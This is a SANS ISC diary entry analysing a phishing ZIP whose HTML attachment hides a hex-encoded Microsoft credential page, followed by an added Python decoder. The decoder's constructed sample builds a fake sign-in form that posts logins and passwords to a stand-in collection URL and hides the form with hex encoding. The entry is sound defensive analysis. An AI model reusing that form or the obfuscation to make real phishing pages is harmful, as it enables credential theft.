SANS ISC InfoSec Forums

Reader Malware: ZIP/HTML Phish

Reader Henry submitted a malicious email attachment: a ZIP file.

It contains a PNG file and an HTML file:

The HTML file contains a script whose payload is a long hexadecimal string; it can be decoded with base64dump.py:
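The decoding step described above, as an added example that is not part of the original diary and does not reproduce the reader's sample: a small Python script that pulls the `<script>` bodies out of an HTML file, finds hex-encoded blobs (both bare `4142...` runs and `\x41\x42` escape sequences), decodes them, and lists any URLs in the decoded content. The HTML page embedded in the block is constructed for the example; the hidden form and its action URL (`example.invalid`) are assumptions, not indicators from the real attachment.

```python
import re
from html.parser import HTMLParser

# Constructed sample (not the reader's attachment): a page whose script carries
# the real content as one long hex string and unhexes it at runtime.
HIDDEN_PAGE = (
    '<title>Sign in to your account</title>'
    '<form method="post" action="https://example.invalid/collect.php">'
    '<input name="login" placeholder="Email, phone, or Skype">'
    '<input type="password" name="passwd"></form>'
)
SAMPLE_HTML = (
    "<html><body><script>\n"
    'var h = "' + HIDDEN_PAGE.encode().hex() + '";\n'
    "var s = ''; for (var i = 0; i < h.length; i += 2) "
    "s += String.fromCharCode(parseInt(h.substr(i, 2), 16));\n"
    "document.write(s);\n"
    "</script></body></html>"
)


class _ScriptCollector(HTMLParser):
    """Collects the text content of every <script> element in a page."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data


def extract_scripts(html):
    """Return the body of each <script> element as a string."""
    p = _ScriptCollector()
    p.feed(html)
    return p.scripts


# Bare hex: an even number of hex digits, not touching other hex digits.
HEX_RUN = re.compile(r"(?<![0-9A-Fa-f])(?:[0-9A-Fa-f]{2}){2,}(?![0-9A-Fa-f])")
# Escaped hex as found in JS string literals: \x41\x42\x43...
ESCAPED_RUN = re.compile(r"(?:\\x[0-9A-Fa-f]{2}){2,}")


def find_hex_runs(text, min_bytes=20):
    """Return hex strings (without \\x prefixes) that decode to >= min_bytes bytes."""
    runs = [m.group(0) for m in HEX_RUN.finditer(text)]
    runs += [m.group(0).replace("\\x", "") for m in ESCAPED_RUN.finditer(text)]
    return [r for r in runs if len(r) // 2 >= min_bytes]


def decode_html_file(html, min_bytes=20):
    """Decode every hex blob found inside the page's scripts; returns a list of bytes."""
    blobs = []
    for script in extract_scripts(html):
        blobs.extend(bytes.fromhex(r) for r in find_hex_runs(script, min_bytes))
    return blobs


URL_RE = re.compile(rb"https?://[^\s\"'<>]+")


def extract_urls(blobs):
    """Pull http(s) URLs out of decoded blobs, e.g. the form action of a phishing page."""
    urls = []
    for b in blobs:
        urls.extend(u.decode("ascii", "replace") for u in URL_RE.findall(b))
    return urls


if __name__ == "__main__":
    decoded = decode_html_file(SAMPLE_HTML)
    for blob in decoded:
        print(blob[:120])
    print(extract_urls(decoded))
```

The minimum length filter keeps short hex-looking identifiers (colour codes, words like `deadbeef`) out of the results; lower `min_bytes` when a sample splits its payload into many small literals.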

The decoded script renders a phishing page for Microsoft credentials, which starts with a captcha:

There is more to this ZIP file: that's for the next diary entry.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

Oct 23rd 2021